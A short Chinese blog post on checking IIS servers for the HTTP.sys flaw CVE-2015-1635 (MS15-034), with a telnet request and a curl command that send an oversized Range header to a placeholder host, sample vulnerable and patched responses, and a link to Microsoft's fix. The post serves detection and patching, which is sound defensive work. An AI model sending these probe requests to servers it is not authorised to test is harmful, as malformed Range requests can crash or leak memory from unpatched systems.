HTTP.SYS远程代码执行漏洞测试

老余博客

简介: 在2015年4月安全补丁日,微软发布的众多安全更新中,修复了HTTP.sys中一处允许远程执行代码漏洞,编号为:CVE-2015-1635(MS15-034 )。利用HTTP.sys的安全漏洞,攻击者只需要发送恶意的http请求数据包,就可能远程读取IIS服务器的内存数据,或使服务器系统蓝屏崩溃。根据公告显示,该漏洞对服务器系统造成了不小的影响,主要影响了包括Windows 7、Windows Server 2008 R2、Windows 8、Windows Server 2012、Windows 8.1 和 Windows Server 2012 R2在内的主流服务器操作系统。 测试: 方法1:

# telnet www.test.com 80
GET / HTTP/1.1
Host: stuff
Range: bytes=0-18446744073709551615

方法2:

# curl -v www.test.com -H "Host: irrelevant" -H "Range: bytes=0-18446744073709551615"

判断是否存在漏洞: 不存在该漏洞的响应包为:

HTTP Error 400. The request has an invalid header name.

存在漏洞的响应包为:

< HTTP/1.1 416 Requested Range Not Satisfiable
< Content-Type: text/html
< Last-Modified: Thu, 22 Aug 2013 23:53:12 GMT
< Accept-Ranges: bytes
< ETag: "2edebc2929fce1:0"

如何修复该问题:https://docs.microsoft.com/zh-cn/security-updates/Securitybulletins/2015/ms15-034 ,找到对应的系统版本链接,下载安装即可修复此问题。  

赞(0)
分享
文章版权声明:除非注明,否则均为老余个人博客原创文章,转载或复制请以超链接形式并注明出处。

发表评论

评论列表
取消
微信二维码
微信二维码
支付宝二维码
取消
老余博客微信公众号二维码